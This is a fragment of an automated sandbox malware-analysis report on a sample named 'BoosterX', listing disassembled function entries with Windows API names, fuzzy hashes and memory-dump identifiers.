                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 904680172-0
                                                    • Opcode ID: a30e5f59f21d382daf2aa534973ebb390bb07a415331e4e742966db39958626a
                                                    • Instruction ID: d2a9848577b737e5432a771c0a4f7ab4d8f89c285a176758078cef94c22963c1
                                                    • Opcode Fuzzy Hash: a30e5f59f21d382daf2aa534973ebb390bb07a415331e4e742966db39958626a
                                                    • Instruction Fuzzy Hash: 66618E63B15A86B2EE08DF69D6940BC7365FB41F91B544232DBADC7BC2CF28E5618304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 03611529b89fbcd6f417b6da4cd687b86cf868a6bbb853273952e866da9f3ba1
                                                    • Instruction ID: 35cd26b3528020b8cb5e54519d46ce747f5bd180364076ab6c6ff4d092095774
                                                    • Opcode Fuzzy Hash: 03611529b89fbcd6f417b6da4cd687b86cf868a6bbb853273952e866da9f3ba1
                                                    • Instruction Fuzzy Hash: 5A51BE66A0C68361EA189F25E4493A92761FB86BD6F540136EECDC73E2CF3DE4858300
                                                    APIs
                                                      • Part of subcall function 00007FF6C0363E88: FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035E9A3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1011579015-0
                                                    • Opcode ID: 9e468f688a81c359972c1e635341c92bb124f052ba55343c2094050d5c517733
                                                    • Instruction ID: f40c339de8cde2b17c398b612eca1a8d521be1156536c4527e9ec688ecd4e577
                                                    • Opcode Fuzzy Hash: 9e468f688a81c359972c1e635341c92bb124f052ba55343c2094050d5c517733
                                                    • Instruction Fuzzy Hash: 57516A26A0CA87A1FA648F29D4453A93361FB85B85F540236EACDC77F6DF2CE4418714
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 3b8f437387dd1d4006b3f02e2e1b944d07b0b9290f566582f8b0ac23e0e9883b
                                                    • Instruction ID: df22effc20c3f63b5ee1533ff2034ab0a386b495f12a307f10dde4d56fea195e
                                                    • Opcode Fuzzy Hash: 3b8f437387dd1d4006b3f02e2e1b944d07b0b9290f566582f8b0ac23e0e9883b
                                                    • Instruction Fuzzy Hash: 4F41D562B18A9651EA149E17E944379A2A1FB44FC1F488536EF8CC7F4ADF3CD4518300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                    • String ID:
                                                    • API String ID: 3947729631-0
                                                    • Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                    • Instruction ID: 5fc96bb8b27aa4d1d0b6237240f4fd57705d95c8c40664ac1291386a9432cbb7
                                                    • Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                    • Instruction Fuzzy Hash: DA41BF21E19A03A6FB249F11A8502782761AF90B86F94457BDA8DC77D2CF3DF844CB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 680105476-0
                                                    • Opcode ID: 94b01ba5859182e293f6773a60cabc646bafe9d6d8f66b1fcd49a87c24f4ac40
                                                    • Instruction ID: e616f23315714c960c4e871a05d33ea91841ca17286c2bde20ce1b72ce3793c0
                                                    • Opcode Fuzzy Hash: 94b01ba5859182e293f6773a60cabc646bafe9d6d8f66b1fcd49a87c24f4ac40
                                                    • Instruction Fuzzy Hash: 67218E2AA08652A5EA149E92E4102797250EB05FF1F680B31DFBDCBBE5DF7CE4518344
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction ID: 2051b89e2bd8688208d4d42cc77b697a183c12867610e3eedcbbf1315b484b91
                                                    • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                    • Instruction Fuzzy Hash: 0111492291C787A6E720AF50A48063963A4FB40B86F550936EACDD7796DF2CE8008700
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction ID: d7bee4e73c0a6d53141b52486a60702834cf9988b25caaa42e403b0256b6f959
                                                    • Opcode Fuzzy Hash: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction Fuzzy Hash: AB01C4A6E1C68751EA149F28E4452697361FF897A1F505332EBDCCBBA5EF2CD1408704
                                                    APIs
                                                      • Part of subcall function 00007FF6C0381584: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815AB
                                                    • DloadProtectSection.DELAYIMP ref: 00007FF6C0381549
                                                    Similarity
                                                    • API ID: DloadHandleModuleProtectSection
                                                    • String ID:
                                                    • API String ID: 2883838935-0
                                                    • Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction ID: c1ab4ceaeec2542ccafda12c3375e9ffca3f3a66414510e60bdb1540473bc741
                                                    • Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction Fuzzy Hash: C411C961E08A07A1FB619F16E8413B02254AF86B4EF180577CDCEC63A5EF3CA595C610
                                                    APIs
                                                      • Part of subcall function 00007FF6C036407C: FindFirstFileW.KERNELBASE ref: 00007FF6C03640CB
                                                      • Part of subcall function 00007FF6C036407C: FindFirstFileW.KERNELBASE ref: 00007FF6C036411E
                                                      • Part of subcall function 00007FF6C036407C: GetLastError.KERNEL32 ref: 00007FF6C036416F
                                                    • FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                    • Instruction ID: b15a649c0bb25a0f584eedf9f70ade41b5e537adbc68693dcd3953897fa6f526
                                                    • Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                    • Instruction Fuzzy Hash: CFF0C26290C283A5EB509F75A5052792760BF0ABB5F280334DABDCB3DBCF2AD494C750
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                    • Instruction ID: e1474437c83fe24f3737199bfaa5efadf5416de8c03f7fc8c7a27f603ce15c14
                                                    • Opcode Fuzzy Hash: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                    • Instruction Fuzzy Hash: 61E0C212B2095692FF20AF3AC841AB91320FF8DF86B491030CF8CC7322CF28C4998604
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                    • Instruction ID: bcb757e8393bb79bca28feb98e58f7a24e43dbb98d80bdebbe3904f9e6059167
                                                    • Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                    • Instruction Fuzzy Hash: 17D0C916909842A2D9109B3A985207C1250AF92736FA40720D6BEC17E1CF1D949A9214
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 209a15bdd53c5b123fa0d84f3a862c9be3360db7efcf8b869f54dd918b7cc07f
                                                    • Instruction ID: de8a8881564bc8da40feae8e5ac904ab759736a92241289a1cd695beeb82ec44
                                                    • Opcode Fuzzy Hash: 209a15bdd53c5b123fa0d84f3a862c9be3360db7efcf8b869f54dd918b7cc07f
                                                    • Instruction Fuzzy Hash: 21D09E99D1AD07A5FB05DF01E89D7302260FF5871BF521634C48DC53518F7C22958B40
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 9c840309d013360c449daa427f1fc183ac61f7933642795e3a693a1311e8ce7d
                                                    • Instruction ID: 4e180463d96cf79bc8a897bb15109b65e53715878de9f9a2f9514f898bd4283d
                                                    • Opcode Fuzzy Hash: 9c840309d013360c449daa427f1fc183ac61f7933642795e3a693a1311e8ce7d
                                                    • Instruction Fuzzy Hash: 44C04C21F15503D1DB089F26C8CA51813A5BB94B06BA58035D54DC5360DF2DD5EE9745
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction ID: 4290c4247e1b15a3981b55768637fd40fe8a56e3a5dd04b73461906c1c67db3d
                                                    • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction Fuzzy Hash: EBF09A50B1961779FE956F669D127B852806F98B86F4C46B3CDCEC63C2EF2CF8808210
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                    • Instruction ID: fd280f9a95da0a00c9b39277aad5e6c7948d5b02b6576c7eac51209d80f0282e
                                                    • Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                    • Instruction Fuzzy Hash: 71F08122A08A43A5FB248F20E4402B92660EB15B7AF495335D7BCC56D4DF28D895C714
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                    • Instruction ID: 7dd15e9165dc739f1ce263ae0d03c3a9b6f436b5c8ad80619701a4fc8400bc49
                                                    • Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                    • Instruction Fuzzy Hash: 20F0F810B19247A5FF566FB258112B553905F947A2F4847B3DDEEC63C1EF2CA9808610
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 2659423929-3508440684
                                                    • Opcode ID: 578450afe0f1bc0c690d6bb4006d71e7b96940e0835be98eaf36633f6753adaf
                                                    • Instruction ID: e6bd993deed2f8e0498585ae4572af0577946b7620a25861b8b0f0d777c0bfc0
                                                    • Opcode Fuzzy Hash: 578450afe0f1bc0c690d6bb4006d71e7b96940e0835be98eaf36633f6753adaf
                                                    • Instruction Fuzzy Hash: 6F628E66F18643A9FB009F74D4492AD3361AB857A9F504232DAADD7BEADF3CD185C300
                                                    Similarity
                                                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                    • String ID: rtmp
                                                    • API String ID: 3587137053-870060881
                                                    • Opcode ID: 5804a3a641a418029af90becdda62572abb54b7e623b8138e0a4758647245305
                                                    • Instruction ID: 3fc0ba95deceef9a2a4359a1b1032f120d31030f5662d923103defd46c0d0a2e
                                                    • Opcode Fuzzy Hash: 5804a3a641a418029af90becdda62572abb54b7e623b8138e0a4758647245305
                                                    • Instruction Fuzzy Hash: 09F1CC22B08A83A1EA10DF65D8841BD6761FB85B85F541632EE8DC7BA9DF3CE584C740
                                                    Similarity
                                                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1693479884-0
                                                    • Opcode ID: 43a43ba386c24045c0db5af6cf1db9acff8f38ee05368a60e4c32fec91fd7930
                                                    • Instruction ID: 13cebc64ab1f71dae40a58e87847cdb0554b9b8b482583c769a226fd8d0f8021
                                                    • Opcode Fuzzy Hash: 43a43ba386c24045c0db5af6cf1db9acff8f38ee05368a60e4c32fec91fd7930
                                                    • Instruction Fuzzy Hash: 39A1B062F15B5395FE048F7988485BD2321BB85BA6F145232DEADD7BC9DF3CE1818210
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                    • Instruction ID: 03a0ac84de7c1fa33d3469c66c4c78ab5dc49dad1ba26fff62b1a95bb874b943
                                                    • Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                    • Instruction Fuzzy Hash: D8315076609B82A9EB609F60E8903ED7360FB84B45F44453ADA8EC7B98DF38D548C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                    • Instruction ID: e810bf304580ba86126e3b05cfc6f63ad8ddbe3d5118f25a6ed7cad655bbabd4
                                                    • Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                    • Instruction Fuzzy Hash: CC316236608B82A6DB60CF25E8402AE73A0FB84B55F540236EE9DC7B59DF3CD545CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: db7996cf17faa13ca880b81eaf1002c09d293d8692a5d372692e043dc9a0b405
                                                    • Instruction ID: b50a826c2c95551f194edec8908937c30c8dde8a8d39d8efbab4b413fabdab54
                                                    • Opcode Fuzzy Hash: db7996cf17faa13ca880b81eaf1002c09d293d8692a5d372692e043dc9a0b405
                                                    • Instruction Fuzzy Hash: 7DB1BD26B14A83A6EB109F65D8452AD3361FB85B99F405232EE8DC7BE9DF3CD540C300
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C038FA44
                                                      • Part of subcall function 00007FF6C03878B4: GetCurrentProcess.KERNEL32(00007FF6C0390C4D), ref: 00007FF6C03878E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                    • String ID: *?$.
                                                    • API String ID: 2518042432-3972193922
                                                    • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                    • Instruction ID: f706cd35fd800242ab933965261bac2ecc1282917c92775390f1f815a720a42c
                                                    • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                    • Instruction Fuzzy Hash: 1651E362B14AA799EF15DFA298100B867A4FB48BD9B544233DE9DC7B89DF3CD0428300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleNumber
                                                    • String ID:
                                                    • API String ID: 2169056816-0
                                                    • Opcode ID: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                                    • Instruction ID: a128b04f1b6e6915e7a78f33bd63348d1252cd0a5596b3329714a939ba5876b7
                                                    • Opcode Fuzzy Hash: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                                    • Instruction Fuzzy Hash: 44114F32A18B82A6E7618F61E4107E97360FF88B85F844135DA8DC3755DF3CD245CB44
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
                                                    • Instruction ID: a2486be5aca58c0c61c419dc6b93bf6c6a1466429eaf7282509b168bbceef054
                                                    • Opcode Fuzzy Hash: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
                                                    • Instruction Fuzzy Hash: 4901E575A08A43ABFA64CF10E85177A33A1BB99316F600235D69DC67A5DF3CE5058E04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
